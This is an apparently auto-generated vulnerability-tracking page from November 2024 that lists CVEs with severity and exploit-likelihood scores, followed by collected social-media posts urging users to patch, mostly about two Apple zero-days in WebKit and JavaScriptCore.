## Updated at UTC 2024-11-20T21:13:16.729485

| CVE | CVSS | EPSS | Posts | Repos | Nuclei | Updated | Description |
|---|---|---|---|---|---|---|---|
| CVE-2024-43498 | 9.8 | 0.14% | 1 | 0 | | 2024-11-20T18:56:28 | # Microsoft Security Advisory CVE-2024-43498 \| .NET Remote Code Execution Vulner |
| CVE-2024-44308 | 8.8 | 0.04% | 30 | 0 | | 2024-11-20T18:33:20 | The issue was addressed with improved checks. This issue is fixed in Safari 18.1 |
| CVE-2024-44625 | 8.8 | 4.35% | 1 | 1 | | 2024-11-20T16:44:13 | Gogs <=0.13.0 is vulnerable to Directory Traversal via the editFilePost function |
| CVE-2024-10924 | 9.8 | 0.04% | 3 | 7 | | 2024-11-20T15:30:50 | The Really Simple Security (Free, Pro, and Pro Multisite) plugins for WordPress |
| CVE-2024-11395 | 8.8 | 0.04% | 5 | 0 | | 2024-11-20T00:32:14 | Type Confusion in V8 in Google Chrome prior to 131.0.6778.85 allowed a remote at |
| CVE-2024-44309 | 0 | 0.04% | 28 | 0 | | 2024-11-20T00:15:17.137000 | A cookie management issue was addressed with improved state management. This iss |
| CVE-2024-43450 | 7.5 | 0.13% | 1 | 0 | | 2024-11-19T20:49:26.017000 | Windows DNS Spoofing Vulnerability |
| CVE-2024-0793 | 7.7 | 0.12% | 4 | 0 | | 2024-11-19T20:25:31 | A flaw was found in kube-controller-manager. This issue occurs when the initial |
| CVE-2024-21287 | 7.5 | 0.09% | 7 | 0 | | 2024-11-19T18:31:00 | Vulnerability in the Oracle Agile PLM Framework product of Oracle Supply Chain ( |
| CVE-2024-52867 | 8.2 | 0.04% | 4 | 0 | | 2024-11-19T18:30:58 | guix-daemon in GNU Guix before 5ab3c4c allows privilege escalation because build |
| CVE-2024-0012 | 9.8 | 96.61% | 57 | 4 | template | 2024-11-19T17:17:29.723000 | An authentication bypass in Palo Alto Networks PAN-OS software enables an unauth |
| CVE-2024-9474 | 7.2 | 97.40% | 51 | 3 | template | 2024-11-19T17:16:40.513000 | A privilege escalation vulnerability in Palo Alto Networks PAN-OS software allow |
| CVE-2024-11159 | 4.3 | 0.05% | 2 | 0 | | 2024-11-19T14:56:37.800000 | Using remote content in OpenPGP encrypted messages can lead to the disclosure of |
| CVE-2024-48510 | 9.8 | 0.06% | 3 | 0 | | 2024-11-18T23:41:15 | Directory Traversal vulnerability in DotNetZip v.1.16.0 and before allows a remo |
| CVE-2024-49019 | 7.8 | 0.05% | 3 | 0 | | 2024-11-18T21:12:46.067000 | Active Directory Certificate Services Elevation of Privilege Vulnerability |
| CVE-2024-52940 | 7.5 | 0.04% | 1 | 1 | | 2024-11-18T18:32:00 | AnyDesk through 8.1.0 on Windows, when Allow Direct Connections is enabled, inad |
| CVE-2023-0657 | 3.4 | 0.04% | 4 | 0 | | 2024-11-18T17:11:17.393000 | A flaw was found in Keycloak. This issue occurs due to improperly enforcing toke |
| CVE-2023-1419 | 5.9 | 0.09% | 4 | 0 | | 2024-11-18T17:11:17.393000 | A script injection vulnerability was found in the Debezium database connector, w |
| CVE-2023-4639 | 7.4 | 0.10% | 4 | 0 | | 2024-11-18T17:11:17.393000 | A flaw was found in Undertow, which incorrectly parses cookies with certain valu |
| CVE-2023-6110 | 5.5 | 0.08% | 4 | 0 | | 2024-11-18T17:11:17.393000 | A flaw was found in OpenStack. When a user tries to delete a non-existing access |
| CVE-2023-43091 | 9.8 | 0.04% | 4 | 0 | | 2024-11-17T15:30:52 | A flaw was found in GNOME Maps, which is vulnerable to a code injection attack v |
| CVE-2020-25720 | 7.5 | 0.05% | 4 | 0 | | 2024-11-17T12:30:36 | A vulnerability was found in Samba where a delegated administrator with permissi |
| CVE-2024-49060 | 8.8 | 0.04% | 2 | 0 | | 2024-11-15T21:30:53 | Azure Stack HCI Elevation of Privilege Vulnerability |
| CVE-2024-50986 | None | 0.04% | 1 | 1 | | 2024-11-15T15:31:04 | An issue in Clementine v.1.3.1 allows a local attacker to execute arbitrary code |
| CVE-2024-9465 | 9.1 | 94.95% | 10 | 2 | template | 2024-11-15T14:39:34.863000 | An SQL injection vulnerability in Palo Alto Networks Expedition allows an unauth |
| CVE-2024-7404 | 6.8 | 0.04% | 1 | 0 | | 2024-11-15T13:58:08.913000 | An issue was discovered in GitLab CE/EE affecting all versions starting from 17. |
| CVE-2024-9463 | 7.5 | 96.23% | 9 | 0 | template | 2024-11-15T02:00:01.687000 | An OS command injection vulnerability in Palo Alto Networks Expedition allows an |
| CVE-2024-52551 | 8.0 | 0.04% | 1 | 0 | | 2024-11-14T22:45:14 | Jenkins Pipeline: Declarative Plugin 2.2214.vb_b_34b_2ea_9b_83 and earlier does |
| CVE-2024-52552 | 8.0 | 0.04% | 1 | 0 | | 2024-11-14T22:45:13 | Jenkins Authorize Project Plugin 1.7.2 and earlier evaluates a string containing |
| CVE-2024-49025 | 5.4 | 0.05% | 4 | 0 | | 2024-11-14T21:32:11 | Microsoft Edge (Chromium-based) Information Disclosure Vulnerability |
| CVE-2024-36513 | 8.8 | 0.04% | 1 | 0 | | 2024-11-14T20:35:26.093000 | A privilege context switching error vulnerability [CWE-270] in FortiClient Windo |
| CVE-2024-36509 | 4.4 | 0.04% | 1 | 0 | | 2024-11-14T20:33:44.727000 | An exposure of sensitive system information to an unauthorized control sphere vu |
| CVE-2024-8068 | None | 0.04% | 3 | 0 | | 2024-11-14T18:30:34 | Privilege escalation to NetworkService Account access in Citrix Session Recordin |
| CVE-2024-50252 | 5.5 | 0.04% | 1 | 0 | | 2024-11-14T18:08:17.857000 | In the Linux kernel, the following vulnerability has been resolved: mlxsw: spec |
| CVE-2024-52554 | 8.8 | 0.04% | 1 | 0 | | 2024-11-14T15:42:42 | Jenkins Shared Library Version Override Plugin 17.v786074c9fce7 and earlier decl |
| CVE-2024-52550 | 8.0 | 0.04% | 1 | 0 | | 2024-11-14T15:41:49 | Jenkins Pipeline: Groovy Plugin 3990.vd281dd77a_388 and earlier, except 3975.397 |
| CVE-2024-52553 | 8.8 | 0.04% | 1 | 0 | | 2024-11-14T15:37:53 | Jenkins OpenId Connect Authentication Plugin 4.418.vccc7061f5b_6d and earlier do |
| CVE-2024-52549 | 4.3 | 0.04% | 1 | 0 | | 2024-11-14T15:35:55 | Jenkins Script Security Plugin 1367.vdf2fc45f229c and earlier, except 1365.1367. |
| CVE-2024-8648 | 6.1 | 0.04% | 1 | 0 | | 2024-11-14T15:32:16 | An issue has been discovered in GitLab CE/EE affecting all versions from 16 befo |
| CVE-2024-5917 | None | 0.04% | 1 | 1 | | 2024-11-14T12:31:09 | A server-side request forgery in PAN-OS software enables an unauthenticated atta |
| CVE-2024-9472 | None | 0.04% | 1 | 1 | | 2024-11-14T12:31:08 | A null pointer dereference in Palo Alto Networks PAN-OS software on PA-800 Serie |
| CVE-2024-2552 | None | 0.04% | 1 | 1 | | 2024-11-14T12:31:08 | A command injection vulnerability in Palo Alto Networks PAN-OS software enables |
| CVE-2024-5920 | None | 0.04% | 1 | 0 | | 2024-11-14T12:31:02 | A cross-site scripting (XSS) vulnerability in Palo Alto Networks PAN-OS software |
| CVE-2024-5918 | None | 0.04% | 1 | 0 | | 2024-11-14T12:31:02 | An improper certificate validation vulnerability in Palo Alto Networks PAN-OS so |
| CVE-2024-5919 | None | 0.04% | 1 | 1 | | 2024-11-14T12:31:02 | A blind XML External Entities (XXE) injection vulnerability in the Palo Alto Net |
| CVE-2024-8180 | 5.4 | 0.04% | 1 | 0 | | 2024-11-14T12:31:02 | An issue has been discovered in GitLab CE/EE affecting all versions from 17.3 be |
| CVE-2024-9693 | 8.6 | 0.04% | 1 | 0 | | 2024-11-14T12:31:02 | An issue was discovered in GitLab CE/EE affecting all versions starting from 16. |
| CVE-2024-2550 | None | 0.04% | 1 | 1 | | 2024-11-14T12:31:01 | A null pointer dereference vulnerability in the GlobalProtect gateway in Palo Al |
| CVE-2024-2551 | None | 0.04% | 1 | 1 | | 2024-11-14T12:31:01 | A null pointer dereference vulnerability in Palo Alto Networks PAN-OS software e |
| CVE-2024-8535 | 8.8 | 0.04% | 1 | 0 | | 2024-11-14T00:31:11 | Authenticated user can access unintended user capabilities in NetScaler ADC and |
| CVE-2024-43093 | 7.8 | 0.25% | 3 | 2 | | 2024-11-13T21:31:39 | In shouldHideDocument of ExternalStorageProvider.java, there is a possible bypas |
| CVE-2024-8534 | 5.3 | 0.04% | 1 | 0 | | 2024-11-13T21:30:33 | Memory safety vulnerability leading to memory corruption and Denial of Service i |
| CVE-2024-11116 | 4.3 | 0.04% | 1 | 0 | | 2024-11-13T18:33:06 | Inappropriate implementation in Blink in Google Chrome prior to 131.0.6778.69 al |
| CVE-2024-11110 | 6.5 | 0.04% | 2 | 0 | | 2024-11-13T18:33:05 | Inappropriate implementation in Extensions in Google Chrome prior to 131.0.6778. |
| CVE-2024-11115 | 8.8 | 0.04% | 1 | 0 | | 2024-11-13T18:33:05 | Insufficient policy enforcement in Navigation in Google Chrome on iOS prior to 1 |
| CVE-2024-11111 | 4.3 | 0.04% | 1 | 0 | | 2024-11-13T18:33:05 | Inappropriate implementation in Autofill in Google Chrome prior to 131.0.6778.69 |
| CVE-2024-11117 | 4.3 | 0.04% | 2 | 0 | | 2024-11-13T18:31:59 | Inappropriate implementation in FileSystem in Google Chrome prior to 131.0.6778. |
| CVE-2024-8069 | 8.8 | 0.04% | 3 | 0 | | 2024-11-13T18:31:59 | Limited remote code execution with privilege of a NetworkService Account access |
| CVE-2014-2120 | 5.4 | 0.25% | 2 | 0 | | 2024-11-13T18:31:52 | Cross-site scripting (XSS) vulnerability in the WebVPN login page in Cisco Adapt |
| CVE-2024-33505 | 5.6 | 0.04% | 1 | 0 | | 2024-11-13T17:01:16.850000 | A heap-based buffer overflow in Fortinet FortiAnalyzer version 7.4.0 through 7.4 |
| CVE-2023-50176 | 7.5 | 0.04% | 1 | 0 | | 2024-11-13T17:01:16.850000 | A session fixation in Fortinet FortiOS version 7.4.0 through 7.4.3 and 7.2.0 thr |
| CVE-2023-47543 | 5.4 | 0.04% | 1 | 0 | | 2024-11-13T17:01:16.850000 | An authorization bypass through user-controlled key vulnerability [CWE-639] in F |
| CVE-2024-47574 | 7.8 | 0.04% | 2 | 0 | | 2024-11-13T12:32:16 | A authentication bypass using an alternate path or channel in Fortinet FortiClie |
| CVE-2024-11114 | 8.4 | 0.04% | 1 | 0 | | 2024-11-13T00:30:48 | Inappropriate implementation in Views in Google Chrome on Windows prior to 131.0 |
| CVE-2024-11113 | 8.8 | 0.04% | 1 | 0 | | 2024-11-13T00:30:48 | Use after free in Accessibility in Google Chrome prior to 131.0.6778.69 allowed |
| CVE-2024-11112 | 7.5 | 0.04% | 1 | 0 | | 2024-11-13T00:30:48 | Use after free in Media in Google Chrome on Windows prior to 131.0.6778.69 allow |
| CVE-2024-32117 | 4.9 | 0.04% | 1 | 0 | | 2024-11-12T21:31:01 | An improper limitation of a pathname to a restricted directory ('Path Traversal' |
| CVE-2024-26011 | 5.3 | 0.04% | 1 | 0 | | 2024-11-12T21:31:01 | A missing authentication for critical function in Fortinet FortiManager version |
| CVE-2024-40592 | 7.6 | 0.04% | 1 | 0 | | 2024-11-12T21:31:01 | An improper verification of cryptographic signature vulnerability [CWE-347] in F |
| CVE-2024-23666 | 7.5 | 0.04% | 1 | 0 | | 2024-11-12T21:30:54 | A client-side enforcement of server-side security in Fortinet FortiAnalyzer-BigD |
| CVE-2024-36507 | 7.3 | 0.05% | 1 | 0 | | 2024-11-12T21:30:53 | A untrusted search path in Fortinet FortiClientWindows versions 7.4.0, versions |
| CVE-2024-31496 | 6.7 | 0.04% | 1 | 0 | | 2024-11-12T21:30:52 | A stack-based buffer overflow vulnerability [CWE-121] in Fortinet FortiManager v |
| CVE-2024-33510 | 4.3 | 0.04% | 1 | 0 | | 2024-11-12T21:30:52 | An improper neutralization of special elements in output used by a downstream co |
| CVE-2024-32118 | 6.7 | 0.04% | 1 | 0 | | 2024-11-12T21:30:52 | Multiple improper neutralization of special elements used in an OS command ('OS |
| CVE-2024-32116 | 5.1 | 0.04% | 1 | 0 | | 2024-11-12T21:30:52 | Multiple relative path traversal vulnerabilities [CWE-23] in Fortinet FortiManag |
| CVE-2023-44255 | 4.1 | 0.04% | 1 | 0 | | 2024-11-12T21:30:52 | An exposure of sensitive information to an unauthorized actor [CWE-200] in Forti |
| CVE-2024-35274 | 2.3 | 0.04% | 1 | 0 | | 2024-11-12T21:30:52 | An improper limitation of a pathname to a restricted directory ('Path Traversal' |
| CVE-2024-43602 | 10.0 | 0.05% | 1 | 0 | | 2024-11-12T18:31:06 | Azure CycleCloud Remote Code Execution Vulnerability |
| CVE-2024-43451 | 6.5 | 0.47% | 19 | 0 | | 2024-11-12T18:31:05 | NTLM Hash Disclosure Spoofing Vulnerability |
| CVE-2024-49040 | 7.5 | 0.09% | 4 | 0 | | 2024-11-12T18:31:00 | Microsoft Exchange Server Spoofing Vulnerability |
| CVE-2024-49039 | 8.8 | 1.23% | 7 | 1 | | 2024-11-12T18:31:00 | Windows Task Scheduler Elevation of Privilege Vulnerability |
| CVE-2024-43639 | 9.8 | 0.14% | 3 | 0 | | 2024-11-12T18:30:59 | Windows Kerberos Remote Code Execution Vulnerability |
| CVE-2024-51567 | 10.0 | 40.13% | 3 | 2 | | 2024-11-08T21:34:54 | upgrademysqlstatus in databases/views.py in CyberPanel (aka Cyber Panel) before |
| CVE-2024-5910 | 9.8 | 97.10% | 9 | 1 | template | 2024-11-08T21:33:52 | Missing authentication for a critical function in Palo Alto Networks Expedition |
| CVE-2024-40715 | 7.7 | 0.07% | 1 | 0 | | 2024-11-08T19:01:03.880000 | A vulnerability in Veeam Backup & Replication Enterprise Manager has been identi |
| CVE-2020-11921 | 8.8 | 0.04% | 1 | 0 | | 2024-11-08T18:31:57 | An issue was discovered in Lush 2 through 2020-02-25. Due to the lack of Bluetoo |
| CVE-2024-51998 | 8.6 | 0.04% | 1 | 0 | | 2024-11-08T13:55:32 | ### Summary The validation for the file URI scheme falls short, and results in |
| CVE-2024-51987 | 5.4 | 0.04% | 1 | 1 | | 2024-11-08T13:55:27 | ### Impact HTTP Clients created by `AddUserAccessTokenHttpClient` may use a diff |
| CVE-2024-47072 | 7.5 | 0.04% | 1 | 0 | | 2024-11-08T13:55:23 | ### Impact The vulnerability may allow a remote attacker to terminate the applic |
| CVE-2024-50340 | 7.3 | 0.05% | 1 | 1 | template | 2024-11-06T23:39:52 | ### Description When the `register_argc_argv` php directive is set to `on` , an |
| CVE-2024-20484 | 7.5 | 0.04% | 1 | 1 | | 2024-11-06T18:31:17 | A vulnerability in the External Agent Assignment Service (EAAS) feature of Cisco |
| CVE-2024-20536 | 8.8 | 0.04% | 1 | 0 | | 2024-11-06T18:31:17 | A vulnerability in a REST API endpoint and web-based management interface of Cis |
| CVE-2024-10826 | 8.8 | 0.04% | 1 | 0 | | 2024-11-06T18:31:17 | Use after free in Family Experiences in Google Chrome on Android prior to 130.0. |
| CVE-2024-10827 | 8.8 | 0.04% | 1 | 0 | | 2024-11-06T18:31:17 | Use after free in Serial in Google Chrome prior to 130.0.6723.116 allowed a remo |
| CVE-2024-42509 | 9.8 | 0.04% | 3 | 0 | | 2024-11-06T18:17:17.287000 | Command injection vulnerability in the underlying CLI service could lead to unau |
| CVE-2024-47460 | 9.0 | 0.04% | 1 | 0 | | 2024-11-06T18:17:17.287000 | Command injection vulnerability in the underlying CLI service could lead to unau |
| CVE-2024-20418 | 10.0 | 0.04% | 1 | 0 | | 2024-11-06T18:17:17.287000 | A vulnerability in the web-based management interface of Cisco Unified Industria |
| CVE-2024-10914 | 8.1 | 16.93% | 6 | 5 | template | 2024-11-06T15:30:46 | A vulnerability was found in D-Link DNS-320, DNS-320LW, DNS-325 and DNS-340L up |
| CVE-2024-49767 | 7.5 | 0.06% | 1 | 1 | | 2024-11-05T21:35:24 | Applications using Werkzeug to parse `multipart/form-data` requests are vulnerab |
| CVE-2024-8934 | 6.5 | 0.04% | 1 | 0 | | 2024-10-31T15:31:04 | A local user with administrative access rights can enter specialy crafted values |
| CVE-2024-44252 | 7.1 | 0.04% | 1 | 1 | | 2024-10-30T18:30:48 | A logic issue was addressed with improved file handling. This issue is fixed in |
| CVE-2024-38821 | 9.1 | 0.04% | 1 | 1 | | 2024-10-28T17:59:30 | Spring WebFlux applications that have Spring Security authorization rules on sta |
| CVE-2024-49766 | None | 0.04% | 1 | 1 | | 2024-10-26T03:47:04 | On Python < 3.11 on Windows, `os.path.isabs()` does not catch UNC paths like `// |
| CVE-2024-47575 | 9.8 | 5.18% | 9 | 8 | | 2024-10-23T15:31:52 | A missing authentication for critical function in FortiManager 7.6.0, FortiManag |
| CVE-2024-21216 | 9.8 | 0.15% | 2 | 1 | | 2024-10-17T15:31:09 | Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware |
| CVE-2024-4131 | 7.8 | 0.04% | 1 | 1 | | 2024-10-11T18:32:57 | A DLL hijack vulnerability was reported in Lenovo Emulator that could allow a lo |
| CVE-2024-43601 | 7.1 | 0.05% | 1 | 1 | | 2024-10-08T18:33:29 | Visual Studio Code for Linux Remote Code Execution Vulnerability |
| CVE-2024-38813 | 7.5 | 0.09% | 19 | 0 | | 2024-10-02T15:31:39 | The vCenter Server contains a privilege escalation vulnerability. A malicious ac |
| CVE-2024-38812 | 9.8 | 0.09% | 19 | 1 | | 2024-10-02T15:30:37 | The vCenter Server contains a heap-overflow vulnerability in the implementation |
| CVE-2022-46751 | 8.2 | 0.15% | 1 | 0 | | 2024-09-30T13:35:28 | Improper Restriction of XML External Entity Reference, XML Injection (aka Blind |
| CVE-2024-47062 | 8.8 | 0.05% | 1 | 1 | template | 2024-09-20T22:07:52 | # Security Advisory: Multiple Vulnerabilities in Navidrome ## Summary Navidrom |
| CVE-2024-45409 | 10.0 | 16.41% | 1 | 1 | template | 2024-09-16T15:29:27 | Ruby-SAML in <= 12.2 and 1.13.0 <= 1.16.0 does not properly verify the signature |
| CVE-2024-40711 | 9.8 | 96.69% | 1 | 2 | template | 2024-09-09T18:30:30 | A deserialization of untrusted data vulnerability with a malicious payload can a |
| CVE-2024-42057 | 8.1 | 0.09% | 2 | 0 | | 2024-09-03T03:30:40 | A command injection vulnerability in the IPSec VPN feature of Zyxel ATP series f |
| CVE-2024-39717 | 6.6 | 0.21% | 2 | 0 | | 2024-08-27T18:31:36 | The Versa Director GUI provides an option to customize the look and feel of the |
| CVE-2024-5034 | 8.8 | 0.04% | 1 | 1 | | 2024-08-01T15:33:03 | The SULly WordPress plugin before 4.3.1 does not have CSRF checks in some places |
| CVE-2017-0199 | 7.8 | 97.50% | 1 | 26 | | 2024-07-24T17:11:35.740000 | Microsoft Office 2007 SP3, Microsoft Office 2010 SP2, Microsoft Office 2013 SP1, |
| CVE-2024-38094 | 7.2 | 4.64% | 1 | 0 | | 2024-07-09T18:31:01 | Microsoft SharePoint Remote Code Execution Vulnerability |
| CVE-2024-4577 | 9.8 | 96.32% | 1 | 54 | template | 2024-06-21T21:35:02 | In PHP versions 8.1.* before 8.1.29, 8.2.* before 8.2.20, 8.3.* before 8.3.8, wh |
| CVE-2024-35250 | 7.8 | 0.04% | 2 | 1 | | 2024-06-20T18:35:10 | Windows Kernel-Mode Driver Elevation of Privilege Vulnerability |
| CVE-2024-30103 | 8.8 | 0.09% | 1 | 0 | | 2024-06-11T18:30:56 | Microsoft Outlook Remote Code Execution Vulnerability |
| CVE-2024-30051 | 7.8 | 0.08% | 1 | 1 | | 2024-05-16T20:27:22.830000 | Windows DWM Core Library Elevation of Privilege Vulnerability |
| CVE-2024-4351 | 8.8 | 0.05% | 1 | 1 | | 2024-05-16T12:30:29 | The Tutor LMS Pro plugin for WordPress is vulnerable to unauthorized access of d |
| CVE-2024-3400 | 9.8 | 96.41% | 1 | 1 | template | 2024-04-29T05:02:31 | A command injection vulnerability in the GlobalProtect feature of Palo Alto Netw |
| CVE-2023-27944 | 8.6 | 0.06% | 1 | 0 | | 2024-04-11T21:19:47 | This issue was addressed with a new entitlement. This issue is fixed in macOS Ve |
| CVE-2024-26229 | 7.8 | 0.04% | 2 | 6 | | 2024-04-09T18:30:35 | Windows CSC Service Elevation of Privilege Vulnerability |
| CVE-2023-3519 | 9.8 | 96.55% | 1 | 15 | | 2024-04-04T06:17:12 | Unauthenticated remote code execution |
| CVE-2023-32414 | 8.6 | 0.05% | 1 | 0 | | 2024-04-04T05:08:19 | The issue was addressed with improved checks. This issue is fixed in macOS Ventu |
| CVE-2023-27997 | 9.8 | 9.72% | 2 | 9 | | 2024-04-04T04:45:33 | A heap-based buffer overflow vulnerability [CWE-122] in FortiOS version 7.2.4 an |
| CVE-2024-20767 | 8.2 | 11.07% | 2 | 1 | | 2024-03-18T12:31:54 | ColdFusion versions 2023.6, 2021.12 and earlier are affected by an Improper Acce |
| CVE-2023-36328 | 9.8 | 0.16% | 1 | 0 | | 2024-03-07T18:30:26 | Integer Overflow vulnerability in mp_grow in libtom libtommath before commit beb |
| CVE-2023-4911 | 7.8 | 17.23% | 1 | 16 | template | 2024-03-02T05:06:50 | A buffer overflow was discovered in the GNU C Library's dynamic loader ld.so whi |
| CVE-2024-1212 | 10.0 | 91.88% | 4 | 1 | template | 2024-02-21T18:31:06 | Unauthenticated remote attackers can access the system through the LoadMaster ma |
| CVE-2024-23113 | 9.8 | 1.84% | 5 | 8 | | 2024-02-15T15:30:37 | A use of externally-controlled format string in Fortinet FortiOS versions 7.4.0 |
| CVE-2023-20198 | 10.0 | 88.58% | 2 | 30 | template | 2024-02-03T05:07:29 | Cisco is aware of active exploitation of a previously unknown vulnerability in t |
| CVE-2023-20273 | 7.2 | 7.47% | 2 | 3 | | 2024-02-03T05:06:23 | A vulnerability in the web UI feature of Cisco IOS XE Software could allow an au |
| CVE-2020-3259 | 7.5 | 2.71% | 1 | 0 | | 2023-08-16T18:30:19 | A vulnerability in the web services interface of Cisco Adaptive Security Applian |
| CVE-2021-40539 | 9.8 | 97.47% | 2 | 5 | template | 2023-08-08T15:31:21 | Zoho ManageEngine ADSelfService Plus version 6113 and prior is vulnerable to RES |
| CVE-2021-4043 | 5.5 | 0.09% | 1 | 9 | | 2023-06-05T05:00:42 | NULL Pointer Dereference in GitHub repository gpac/gpac prior to 1.1.0. |
| CVE-2019-16278 | 9.8 | 97.42% | 3 | 15 | template | 2023-03-23T18:30:31 | Directory Traversal in the function http_verify in nostromo nhttpd through 1.9.6 |
| CVE-2022-42475 | 9.8 | 27.42% | 2 | 7 | | 2023-02-02T05:01:14 | A heap-based buffer overflow vulnerability [CWE-122] in FortiOS SSL-VPN 7.2.0 th |
| CVE-2021-27860 | 8.8 | 28.52% | 2 | 0 | | 2023-02-01T05:06:42 | A vulnerability in the web management interface of FatPipe WARP, IPVPN, and MPVP |
| CVE-2021-26086 | 5.3 | 97.11% | 2 | 2 | | 2023-01-30T05:01:33 | Affected versions of Atlassian Jira Server and Data Center allow remote attacker |
| CVE-2019-12900 | 9.8 | 1.96% | 1 | 0 | | 2023-01-27T05:02:50 | BZ2_decompress in decompress.c in bzip2 through 1.0.6 has an out-of-bounds write |
| CVE-2020-12271 | 9.8 | 1.67% | 1 | 1 | | 2023-01-27T05:02:29 | A SQL injection issue was found in SFOS 17.0, 17.1, 17.5, and 18.0 before 2020-0 |
| CVE-2024-11394 | 0 | 0.00% | 2 | 1 | | N/A | |
| CVE-2024-11393 | 0 | 0.00% | 2 | 1 | | N/A | |
| CVE-2024-31449 | 0 | 0.04% | 1 | 0 | | N/A | |
| CVE-2024-40590 | 0 | 0.00% | 1 | 0 | | N/A | |
| CVE-2024-10240 | 0 | 0.00% | 1 | 0 | | N/A | |
| CVE-2021-41277 | 0 | 97.29% | 2 | 13 | template | N/A | |
| CVE-2024-45819 | 0 | 0.00% | 1 | 0 | | N/A | |
| CVE-2024-27864 | 0 | 0.00% | 1 | 0 | | N/A | |

CVE-2024-43498
(9.8 CRITICAL)

EPSS: 0.14%

updated 2024-11-20T18:56:28

1 posts

Microsoft Security Advisory CVE-2024-43498 | .NET Remote Code Execution Vulnerability. Executive summary: Microsoft is releasing this security advisory to provide information about a vulnerability in .NET 9.0. This advisory also provides guidance on what developers can do to update their applications to remove this vulnerability. A remote unauthenticated attac

mttaggart@infosec.exchange at 2024-11-12T18:54:56.000Z ##

Some fairly interesting stuff for this #PatchTuesday!

Of particular note for me, a 9.9 in Azure CycleCloud (CVE-2024-43602), a Windows AppContainer escape (CVE-2024-49039), and an RCE in .NET/Visual Studio (CVE-2024-43498)? That one needs more detail.

zerodayinitiative.com/blog/202

##

CVE-2024-44308
(8.8 HIGH)

EPSS: 0.04%

updated 2024-11-20T18:33:20

30 posts

The issue was addressed with improved checks. This issue is fixed in Safari 18.1.1, iOS 17.7.2 and iPadOS 17.7.2, macOS Sequoia 15.1.1, iOS 18.1.1 and iPadOS 18.1.1, visionOS 2.1.1. Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited on Intel-based Mac systems.

apfeltalk@creators.social at 2024-11-20T07:31:10.000Z ##

iOS 18.1.1 and macOS Sequoia 15.1.1 close actively exploited security vulnerabilities
With the new updates iOS 18.1.1 and macOS Sequoia 15.1.1, Apple has closed significant security vulnerabilities that
apfeltalk.de/magazin/feature/i
#Feature #iPad #iPhone #Mac #Apple #CrossSiteScripting #CVE202444308 #CVE202444309 #IntelMac #IOS1811 #JavaScriptCore #MacOSSequoia1511 #Sicherheitsupdate #Webkit

##

kristian@social.purrucker.de at 2024-11-19T21:42:09.000Z ##

Whoa. I had actually expected iOS 18.2 from Apple. Instead they are now pushing out 18.1.1 with a super important security update (CVE-2024-44308) that is supposed to fix a Google-discovered zero-day in WebKit.

#Apple #ios #sicherheitsupdate #webkit #CVE202444308

support.apple.com/en-us/121752

##

jos1264@social.skynetcloud.site at 2024-11-19T21:25:03.000Z ##

Apple Confirms Zero-Day Attacks Hitting Intel-based Macs securityweek.com/apple-confirm #Malware&Threats #Vulnerabilities #CVE202444308 #CVE202444309 #macOSSequioa #iOS1811 #Apple

##

threatcodex at 2024-11-20T17:27:16.977Z ##

Update now! Apple confirms vulnerabilities are already being exploited

malwarebytes.com/blog/news/202

##

screaminggoat at 2024-11-19T18:58:41.227Z ##

Apple exploited zero-days

Both zero-days reported by Clément Lecigne and Benoît Sevens of Google's Threat Analysis Group h/t: @applsec cc: @campuscodi @mttaggart @cR0w @briankrebs @ntkramer @iagox86 @dreadpir8robots @catc0n

##

screaminggoat@infosec.exchange at 2024-11-19T18:58:41.000Z ##

Apple exploited zero-days

Both zero-days reported by Clément Lecigne and Benoît Sevens of Google's Threat Analysis Group h/t: @applsec cc: @campuscodi @mttaggart @cR0w @briankrebs @ntkramer @iagox86 @dreadpir8robots @catc0n

#apple #zeroday #vulnerability #eitw #activeexploitation #cve #CVE_2024_44308 #CVE_2024_44309

##

AAKL at 2024-11-20T14:32:04.784Z ##

If you missed this yesterday, update your iPhone. This relates to CVE-2024-44308 and CVE-2024-44309.

Issues Emergency Security Update for Actively Exploited Vulnerabilities infosecurity-magazine.com/news

Apple security advisories: support.apple.com/en-us/100100

##

jos1264@social.skynetcloud.site at 2024-11-20T11:20:04.000Z ##

Apple fixes 2 zero-days exploited to breach macOS systems (CVE-2024-44309, CVE-2024-44308) helpnetsecurity.com/2024/11/20 #Don'tmiss #Hotstuff #Google #0-day #Apple #macOS #News #iPad #iOS

##

applsec at 2024-11-19T22:04:28.058Z ##

📣 EMERGENCY UPDATES 📣

Apple pushed additional updates for 2 zero-days that may have been actively exploited.

🐛 CVE-2024-44308 (JavaScriptCore) additional patches,
🐛 CVE-2024-44309 (WebKit) additional patches:
- Safari 18.1.1

##

applsec at 2024-11-19T19:45:33.314Z ##

📣 EMERGENCY UPDATES 📣

Apple pushed additional updates for 2 zero-days that may have been actively exploited.

🐛 CVE-2024-44308 (JavaScriptCore) additional patches,
🐛 CVE-2024-44309 (WebKit) additional patches:
- visionOS 2.1.1

##

applsec at 2024-11-19T18:47:56.429Z ##

📣 EMERGENCY UPDATES 📣

Apple pushed updates for 2 new zero-days that may have been actively exploited.

🐛 CVE-2024-44308 (JavaScriptCore),
🐛 CVE-2024-44309 (WebKit):
- iOS and iPadOS 17.7.2
- iOS and iPadOS 18.1.1
- macOS Sequoia 15.1.1

##

AAKL@infosec.exchange at 2024-11-20T14:32:04.000Z ##

If you missed this yesterday, update your iPhone. This relates to CVE-2024-44308 and CVE-2024-44309.

#Apple Issues Emergency Security Update for Actively Exploited Vulnerabilities infosecurity-magazine.com/news #cybersecurity #infosec

Apple security advisories: support.apple.com/en-us/100100

##

jos1264@social.skynetcloud.site at 2024-11-20T11:20:04.000Z ##

Apple fixes 2 zero-days exploited to breach macOS systems (CVE-2024-44309, CVE-2024-44308) helpnetsecurity.com/2024/11/20 #Don'tmiss #Hotstuff #Google #0-day #Apple #macOS #News #iPad #iOS

##

applsec@infosec.exchange at 2024-11-19T22:04:28.000Z ##

📣 EMERGENCY UPDATES 📣

Apple pushed additional updates for 2 zero-days that may have been actively exploited.

🐛 CVE-2024-44308 (JavaScriptCore) additional patches,
🐛 CVE-2024-44309 (WebKit) additional patches:
- Safari 18.1.1

#apple #cybersecurity #infosec #security #ios

##

applsec@infosec.exchange at 2024-11-19T19:45:33.000Z ##

📣 EMERGENCY UPDATES 📣

Apple pushed additional updates for 2 zero-days that may have been actively exploited.

🐛 CVE-2024-44308 (JavaScriptCore) additional patches,
🐛 CVE-2024-44309 (WebKit) additional patches:
- visionOS 2.1.1

#apple #cybersecurity #infosec #security #ios

##

applsec@infosec.exchange at 2024-11-19T18:47:56.000Z ##

📣 EMERGENCY UPDATES 📣

